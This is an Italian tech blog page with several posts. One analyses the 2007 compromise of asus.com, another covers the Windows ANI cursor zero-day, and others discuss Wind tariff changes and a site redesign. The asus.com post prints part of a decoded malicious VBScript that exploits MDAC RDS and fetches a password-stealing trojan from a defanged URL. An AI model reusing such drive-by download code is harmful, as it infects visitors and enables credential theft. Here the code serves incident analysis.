Compromesso un webserver di asus.com

Ieri, tramite il suo blog, Kaspersky ha segnalato la compromissione del sito asus.com. Stando a quanto detto da loro, il codice all’interno della pagina richiamata tramite un iframe inserito nella home page di asus.com sfrutterebbe il recente bug sui file ANI di Microsoft Windows.
L’ISC ha fatto notare che Asus utilizza un round robin DNS per i Webserver. Quello che nessuno ha detto è che l’unico server ad essere stato compromesso è stato 211.72.249.198, l’unico che raggiunto con www.asus.com presenta la pagina internazionale di Asus.

Asus international

Tutti gli altri server presentano la home page standard di Asus USA.
Come già detto, i cracker hanno utilizzato un iframe per includere codice JavaScript e VBScript malevolo, ma contrariamente a quanto detto da Kaspersky, esso non sfrutta il bug sui file ANI ma una vulnerabilità in Microsoft Data Access Components corretta con la patch MS06-014.
Ecco come si presenta la parte compromessa della pagina di www.asus.com (click per ingrandire):
Compromised source of www.asus.com

La pagina iniettata, ospitata su un Webserver cinese (indirizzo ip 222.73.247.123), contiene del codice JavaScript offuscato, il quale una volta decodificato crea un VBScript appositamente scritto per sfruttare la vulnerabilità su RDS, ne riporto la parte più significativa (ho volutamente modificato http nell’url):
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "hxxp://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")

L’immagine PNG richiamata è in realtà un Trojan eseguibile su piattaforme Windows (offuscato) (32bit x86) della famiglia PSW i quali fungono da keylogger e “steal password”.

La cosa grave, a mio avviso, è che a due giorni dalla segnalazione Asus non ha ancora fatto niente per evitare l’infezione dei propri visitatori.

 

Wind e le rimodulazioni forzate

Non trovo miglior modo che partire da un estratto di un articolo apparso su Repubblica alla fine di Marzo:

Se i piccoli adesso sono incapaci di abbassare le tariffe e anzi sono costrette ad aumentarle, non c’è rischio che l’abolizione dei costi di ricarica abbia nel lungo periodo un effetto svantaggioso per i consumatori? È il pericolo segnalato nei giorni scorsi da Elserino Piol, uno dei padri delle telecomunicazioni italiane. Il paradosso è che la battaglia della politica per fare risparmiare gli utenti mobili non è finita ma comincia proprio ora.

Wind dopo aver cambiato tutte le proprie tariffe sottoscrivibili, dall’entrata in vigore del decreto Bersani, ha deciso che ciò non bastava per non andare “sott’acqua” (parola dell’AD durante l’intervista delle Iene). Da metà Marzo, Wind ha iniziato a informare ufficialmente i clienti via sms:

Gentile Cliente, dal 01/05/07 il suo piano tariffario Wind 10 diventerà Wind 12. Per info sulle nuove condizioni chiami il 158.

In un “soffio” è volato via il “per sempre” che veniva messo in risalto sulla pubblicità della Wind 10. La doppia beffa è arrivata a chi, prima del decreto Bersani, usava ricariche da 50 euro (ricordo che tali ricariche non prevedevano balzelli).
Mettiamo a confronto Wind 10 con Wind 12 (tutti i prezzi sono i.i.):

  • Wind10:
    • Scatto alla risposta: 15 cents
    • Chiamate voce: 10 cents/minuto (scatti da 5 cents ogni 30 secondi)
    • SMS (e notifica): 10 cents
    • MMS: 60 cents
  • Wind12:
    • Scatto alla risposta: 16 cents
    • Chiamate voce: 12 cents/minuto (scatti da 6 cents ogni 30 secondi)
    • SMS (e notifica): 15 cents
    • MMS: 60 cents

Come se non bastasse, dal 2 Aprile Wind ha iniziato ad avvertire tutti i clienti con attiva la tariffa Sempre Light:

Gentile Cliente, dal 15/05/07 il suo piano tariffario Sempre Light diventerà Wind Senza Scatto New. Per info sulle nuove condizioni chiami il 158.

La tariffa Sempre Light e Senza Scatto New a confronto:

  • Sempre Light:
    • Scatto alla risposta: 0 cents
    • Chiamate voce: 24,80 cents/minuto, dopo 3 minuti 12,40 cents/minuto
    • SMS (e notifica): 12,40 cents
    • MMS: 60 cents
  • Wind Senza Scatto New
    • Scatto alla risposta: 0 cents
    • Chiamate voce: 24 cents/minuto
    • SMS (e notifica): 15 cents
    • MMS: 60 cents

Le rimodulazioni non si sono fermate qui infatti:

Dal 28/04/2007 l’offerta PASS (e MEGA) non sarà più valida all’Estero. In questo caso si applicheranno le tariffe a consumo previste all’Estero. Info su 155.it

Spero che questa modifica riporti ad un assestamento del prezzo delle tariffe dati all’estero.
Fino al 28 Aprile, per chi ha attive le offerte PASS o MEGA all’estero il singolo KB costa 90 cents ovvero 921,6 euro a MB.

Attenzione a chi vorrà cambiare tariffa non seguendo la modifica forzata, secondo quanto segnalato da WindWorld, qualsiasi cambio piano costa 7 euro ed è molto probabile che comporti la perdita delle opzioni attive.

Cosa si può fare per difendersi da queste rimodulazioni? A dire il vero poco. WindWorld ha redatto un ottimo articolo a riguardo mentre Aduc si è espressa chiaramente.

Ci sarebbe veramente molto da scrivere sull’argomento, MobileBlog lo ha capito e ha recentemente pubblicato una sentenza del Giudice di Pace di Pomigliano d’Arco il quale ha dichiarato illegittima la modifica unilaterale delle condizioni contrattuali, operate dalla Wind Telecomunicazioni S.p.A., in merito alla tariffa “NOI 2 WIND”. Un mese fa, un caso analogo, era venuto alla ribalta.

Va detto, comunuque, che tra tutte le rimodulazioni ce n’è una positiva, gli sms gratutiti verso Wind messi a disposizione dall’opzione Noi Wind SMS, dal 26 Marzo, sono 4000 al costo di 2 euro/mese. Prima l’opzione costava 3 euro/mese ed offriva 300 sms gratuiti.

Per adesso mi astengo da commenti, anche se, è mio malgrado dirlo, sono molto deluso dall’operatore arancione.

 

Buffer overflow nei cursori animati di Windows (Vista, XP, 2003 e 2000)

Windows animated cursorMicrosoft sta affrontando quella che definirei una delle più serie vulnerabilità zero-day di Windows.
L’exploit zero-day segnlato il 28 Marzo dal laboratorio di McAfee riguarda un buffer overflow nel gestore dei cursori animati di Windows (user32.dll), esso infatti non controllando l’header dei file “.ani” (animated) causa un bufferoverflow che pu essere usato per compromettere un sistema Windows.
La paternità sulla scoperta del bug spetta a Determina, la quale già dallo scorso 20 Dicembre sta collaborando attivamente con Microsoft per risolvere il problema. Secondo quanto detto nell’advisory ufficiale la patch rilasciata due anni fa da Microsoft, dopo la segnalazione del bug da eEye, il problema dei buffer overflow nell’header dei cursori animati non era stato completamente risolto.

La pericolosità di questo bug sta nel fatto che un file, di icone animate, creato ad arte può essere inserito in qualsiasi pagina Web o e-mail. Addirittura aprendo una cartella con un file “ani” creato ad arte, a causa del servizio anteprima di Windows, senza bisogno di aprire il file sarà possibile far crashare il processo “explorer”.

Tramite il bollettino di Microsoft si apprende che i vettori di attacco sono Internet Explorer, Outlook Express, Outlook e Windows Mail. Microsoft stessa consiglia di leggere le e-mail in modalità testo semplice (plain text) in Outlook 2002 e successivi e Windows Mail. Attenzione perchè con Windows Mail se si inoltra o si risponde ad una e-mail arrivata, anche se è attiva la modalità testo semplice, il problema non si risolve. Da notare inoltre che per qualsiasi versione di Outlook Express attualmente non esistono workaround.

Per ora Firefox sembra non essere interessato dal problema, anche se in teoria potrebbe esserlo in quanto gestisce i cursori animati tramite le API di Windows.

Benchè il bug sia molto recente sono moltissimi gli exploit pubblici e le varianti utilizzate da gruppi senza scrupolo. Come successo circa un mese fa, alcuni siti compromessi, sono utilizzati per veicolare versioni malevole di exploit sfruttanti la vulnerabilità sui cursori animati. L’ISC ha fornito una lista aggiornata dei domini utilizzati e una regola per Snort, che blocca i file “ani”, sicuramente più efficace del blocco a livello DNS.

Microsoft ha fatto sapere che rilascerà la patch ufficiale domani, 3 Aprile, vista la gravità del problema. La software house di Redmond ci tiene a sottolineare che la path al problema era già stata prevista, grazie alla collaborazione con Determina, per il 10 Aprile.

Esistono due patch non ufficiali per risolvere il bug in questione: una rilasciata da eEye e l’altra da ZIRT. Attenzione però al falso senso di sicurezza, esiste un exploit pubblico che riesce a bypassare i controlli messi in pratica dalla patch di eEye.

In definitiva tutti i sistemi Microsoft Windows basati su NT sono vulnerabili: Windows 2000, Windows XP, Windows 2003 e Windows Vista.

Update: come annunciato Microsoft ha pubblicato la patch. Consiglio di installarla il prima possibile.

 

MatteoCarli’s Layout 2.0

Ormai ve ne sarete accorti: dopo alcuni mesi di utilizzo del vecchio tema ho deciso di adottarne uno completamente nuovo ed esclusivo, frutto di duro lavoro.
I cambiamenti sono stati radicali: nuovo logo, nuovi colori, nuova impaginazione dei post, ecc…
Tutto questo non sarebbe stato possibile senza l’aiuto di Davide Del Monte, il quale ha ideato la gran parte del tema.
Un ringraziamento va anche ad Andrea e Giovanni che sono stati disponibili nel darmi pareri durante lo sviluppo di MatteoCarli.com’s Layout 2.0 (il nome è tutto un programma :) ).

Alcune piccole cose devono ancora essere perfezionate, nel frattempo se avete suggerimenti da fare non esitate a lasciare un commento: mi farebbe molto piacere sapere cosa ne pensate!